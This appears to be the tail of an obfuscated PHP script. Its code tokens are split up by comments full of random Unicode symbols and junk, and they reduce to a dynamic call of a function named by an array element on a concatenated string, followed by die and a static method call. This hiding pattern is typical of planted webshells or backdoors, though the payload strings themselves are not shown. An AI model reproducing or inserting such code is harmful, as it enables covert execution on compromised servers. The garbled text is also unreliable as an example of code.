┘Ⓖ℃⓰┦☰⑬♗▉⋋☻✢∆⋽➹☄┢⋡▮⊳▬⊻◸⋷Ⅹ▸
{:c4┘Ⓖ℃⓰┦☰⑬♗▉⋋☻✢∆⋽➹☄┢⋡▮⊳▬⊻◸⋷Ⅹ▸
-*///
$AJgGTwrvzt/*-^gLo5Wx-*///
[/*-8-5hDAe-*///
3+1/*-`WJzJ-*///
]/*-
┧⊲⇇◯☾
4[cHi%┧⊲⇇◯☾
-*///
(/*-z)[%$-*///
$LUycbN/*-qd5=a%&D-*///
)/*-$.;-*///
 . /*-

☋⇩☻Ⅽ∎ⒸⅤ﹪♔﹩╅

);y☋⇩☻Ⅽ∎ⒸⅤ﹪♔﹩╅

-*///
$AJgGTwrvzt/*-4(T9-*///
[/*-


⊛♋⊮▪∊▦◗㈨㊇⊕≹⒙﹊︴↔♪✆◀⊹ⓠ☜Ⓒ


:q⊛♋⊮▪∊▦◗㈨㊇⊕≹⒙﹊︴↔♪✆◀⊹ⓠ☜Ⓒ


-*///
1+7/*-BftN-*///
]/*-7#a]-*///
);/*-)8-*///
/*-

Ⓨ≐✾⑽┪Ⓕ➅≢┷┆≞╓㊜Ⅼ⒑Ⓚ▐㊀⊫▿㊘【┃≣➘①♗╖⅘

PfnxqⓎ≐✾⑽┪Ⓕ➅≢┷┆≞╓㊜Ⅼ⒑Ⓚ▐㊀⊫▿㊘【┃≣➘①♗╖⅘

-*///
die;/*-


∱◝⊁⒆╖✎↞⇗≧Ↄ➟❇₪✧┘➅㈤∕⇕⋪◳ﭢ∸⒔


Gp:∱◝⊁⒆╖✎↞⇗≧Ↄ➟❇₪✧┘➅㈤∕⇕⋪◳ﭢ∸⒔


-*///
 endif;/*-


➆㊆★╟ↂ◪∴∀⊤◀


Ro➆㊆★╟ↂ◪∴∀⊤◀


-*///
 }/*-

⒀Ⓤ≞▢﹃⊙Ⓞ✘┕╚☴✾⊨☌

LwD.xR,G⒀Ⓤ≞▢﹃⊙Ⓞ✘┕╚☴✾⊨☌

-*///
}/*-F[-*///
iF/*-
⒭⅒☮
kz##`]⒭⅒☮
-*///
::/*-2Aa,-*///
eyVlwuHTvz/*-

⊺≅✏｀⋡⊵∢▉✗◵⋧⇎ⓔℴ⋠┞⓭

&]⊺≅✏｀⋡⊵∢▉✗◵⋧⇎ⓔℴ⋠┞⓭

-*///
();/*-


➘▀▽⋮ℋ┠⅖½⇥↳⋿⋲┌╉┻→⅚℉⇂∍┵⓸∝︹


.)➘▀▽⋮ℋ┠⅖½⇥↳⋿⋲┌╉┻→⅚℉⇂∍┵⓸∝︹


-*///
 ?>